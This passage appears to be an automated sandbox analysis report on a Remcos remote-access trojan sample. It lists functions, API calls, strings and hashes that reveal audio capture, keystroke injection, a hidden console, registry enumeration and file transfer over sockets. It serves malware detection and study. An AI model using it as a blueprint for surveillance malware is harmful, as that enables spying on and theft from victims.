                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                              • String ID: dMG$|MG$PG
                                              • API String ID: 1356121797-532278878
                                              • Opcode ID: 6aa69cd6a01d0fe2356010249b9bd36d42245e4d7c734ee1dd99acc2b44a8f66
                                              • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                              • Opcode Fuzzy Hash: 6aa69cd6a01d0fe2356010249b9bd36d42245e4d7c734ee1dd99acc2b44a8f66
                                              • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                              Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                              • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                              • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                              • TranslateMessage.USER32(?), ref: 0041D57A
                                              • DispatchMessageA.USER32(?), ref: 0041D584
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                              • String ID: Remcos
                                              • API String ID: 1970332568-165870891
                                              • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                              • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                              • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                              • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                              Function 0041CE2C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 48memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • AllocConsole.KERNEL32(0C[), ref: 0041CE35
                                              • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                              • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Console$Window$AllocOutputShow
                                              • String ID: Remcos v$0C[$5.1.3 Pro$CONOUT$
                                              • API String ID: 4067487056-1050092612
                                              • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                              • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                              • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                              • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                              Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2617abffa626f75de14076698c196880abdc2722d48b4afa90194addc5c06332
                                              • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                              • Opcode Fuzzy Hash: 2617abffa626f75de14076698c196880abdc2722d48b4afa90194addc5c06332
                                              • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                              Function 004475F1 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 389COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __freea$__alloca_probe_16_free
                                              • String ID: a/p$am/pm$h{D$v%(/
                                              • API String ID: 2936374016-1133261111
                                              • Opcode ID: f278f6ccdddd9c8957b45727c0f983370dbb743190d53240140d279861cd7d37
                                              • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                              • Opcode Fuzzy Hash: f278f6ccdddd9c8957b45727c0f983370dbb743190d53240140d279861cd7d37
                                              • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                              Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: tcp$udp
                                              • API String ID: 0-3725065008
                                              • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                              • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                              • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                              • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                              Function 00444D7C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              • _free.LIBCMT ref: 00444E87
                                              • _free.LIBCMT ref: 00444E9E
                                              • _free.LIBCMT ref: 00444EBD
                                              • _free.LIBCMT ref: 00444ED8
                                              • _free.LIBCMT ref: 00444EEF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$AllocateHeap
                                              • String ID: KED$v%(/
                                              • API String ID: 3033488037-343497954
                                              • Opcode ID: 608df991a786fcfe36087b9db06c0af1d3846aff496c4c9c780995c6b43937c3
                                              • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                              • Opcode Fuzzy Hash: 608df991a786fcfe36087b9db06c0af1d3846aff496c4c9c780995c6b43937c3
                                              • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                              Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 004018BE
                                              • ExitThread.KERNEL32 ref: 004018F6
                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                              • String ID: PkG$XMG$NG$NG
                                              • API String ID: 1649129571-3151166067
                                              • Opcode ID: 2d9b879654642e1cb38bacb082170558b63e255e5d7d9ef3184acd3b4935e6a6
                                              • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                              • Opcode Fuzzy Hash: 2d9b879654642e1cb38bacb082170558b63e255e5d7d9ef3184acd3b4935e6a6
                                              • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                              Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                              • String ID: .part
                                              • API String ID: 1303771098-3499674018
                                              • Opcode ID: 3afc2f85f810e2c46033f561f8352aaa8f531af2af3959b11cfb50950e871b37
                                              • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                              • Opcode Fuzzy Hash: 3afc2f85f810e2c46033f561f8352aaa8f531af2af3959b11cfb50950e871b37
                                              • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                              Function 0040729B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40COMMON
                                              Download Yara Rule
                                              Strings
                                              • 8)[, xrefs: 004076DF
                                              • hhh-AQVE0Z, xrefs: 00407715
                                              • C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, xrefs: 004076FF
                                              • xdF, xrefs: 004076E4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 8)[$C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$hhh-AQVE0Z$xdF
                                              • API String ID: 0-4121554170
                                              • Opcode ID: 76fb36a6468107bc6bcf7edae7d85ad02bbabba37b75d9201cd6870646e6a122
                                              • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                              • Opcode Fuzzy Hash: 76fb36a6468107bc6bcf7edae7d85ad02bbabba37b75d9201cd6870646e6a122
                                              • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                              Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendInput.USER32 ref: 00419A25
                                              • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                              • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InputSend$Virtual
                                              • String ID:
                                              • API String ID: 1167301434-0
                                              • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                              • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                              • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                              • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                              Function 004413EA Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: v%(/
                                              • API String ID: 0-2435473048
                                              • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                              • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                              • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                              • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                              Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Enum$InfoQueryValue
                                              • String ID: [regsplt]$xUG$TG
                                              • API String ID: 3554306468-1165877943
                                              • Opcode ID: 4d973db950c843e862455cd113a69fa2782c519e2990f350e5f0b2c943bf39e5
                                              • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                              • Opcode Fuzzy Hash: 4d973db950c843e862455cd113a69fa2782c519e2990f350e5f0b2c943bf39e5
                                              • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                              Function 004493E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 171timeCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                              • _free.LIBCMT ref: 0044943D
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • _free.LIBCMT ref: 00449609
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                              • String ID: v%(/
                                              • API String ID: 1286116820-2435473048
                                              • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                              • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                              • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                              • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                              Function 00443E99 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID: v%(/
                                              • API String ID: 269201875-2435473048
                                              • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                              • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                              • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                              • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
